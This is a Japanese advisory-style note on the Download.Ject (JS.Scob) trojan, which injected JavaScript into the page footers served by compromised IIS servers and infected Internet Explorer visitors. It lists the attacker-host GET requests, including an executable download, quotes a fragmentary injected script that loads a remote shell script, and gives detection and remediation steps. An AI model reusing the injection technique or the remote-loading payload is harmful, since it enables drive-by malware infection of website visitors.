Download.Ject に関する情報
■危険度・緊急度
☆★★★★
■インパクト
トロイの木馬型ウィルス
■概要
IEでの画像閲覧により、ファイルをダウンロードし実行させられる。
GET _http_://217.107.218.147/dot.php
GET _http_://217.107.218.147/new.html
GET _http_://217.107.218.147/dot.php
GET _http_://217.107.218.147/new.html
GET _http_://217.107.218.147//main.chm
GET _http_://217.107.218.147/msits.exe
GET _http_://217.107.218.147/redir.php
GET _http_://217.107.218.147/new.html
GET _http_://217.107.218.147/dot.php
GET _http_://217.107.218.147/new.html
GET _http_://217.107.218.147/md.htm
GET _http_://217.107.218.147/redir.php
GET _http_://217.107.218.147/dot.php
GET _http_://217.107.218.147/new.html
GET _http_://217.107.218.147/dot.php
GET _http_://217.107.218.147/new.html
GET _http_://217.107.218.147/md.htm
GET _http_://217.107.218.147/redir.php
IISを実行しているWindows2000の場合、ページのフッターにJavaScriptが埋め込まれてしまう。
それを閲覧したIEでさらに被害拡大していく。
function InjectedDuringRedirection(){
showModalDialog('md.htm', window, "dialog
Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
- 1\;").location= " java script
- '
217.107.218.147/shellxxx.js\\'> <\ /script>'";
■影響のあるプラットフォーム・アプリケーション
Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
■対処
Kk32.dll
Surf.dat
ファイルを検索しもしあれば感染している可能性がある。
IE:833633 - Internet Explorer のマイ コンピュータ ゾーンのセキュリティ設定を強化する方法
IIS:感染したdllを削除する等の処置。
■情報元・関連情報
セキュリティホール memo
ウェブサイトにアクセスしただけで感染--IEユーザーに警告 - CNET Japan
JS.Scob.Trojan
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System - Current Infosec News and Analysis
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System - Current Infosec News and Analysis
Neohapsis Archives - NTBugtraq - #0115 - Alert: IIS compromised to place footer JavaScript on each page
[Full-Disclosure] New malware to infect IIS and from there jump to clients
ITmedia エンタープライズ:IIS攻撃の方法では一致、しかし規模では異論噴出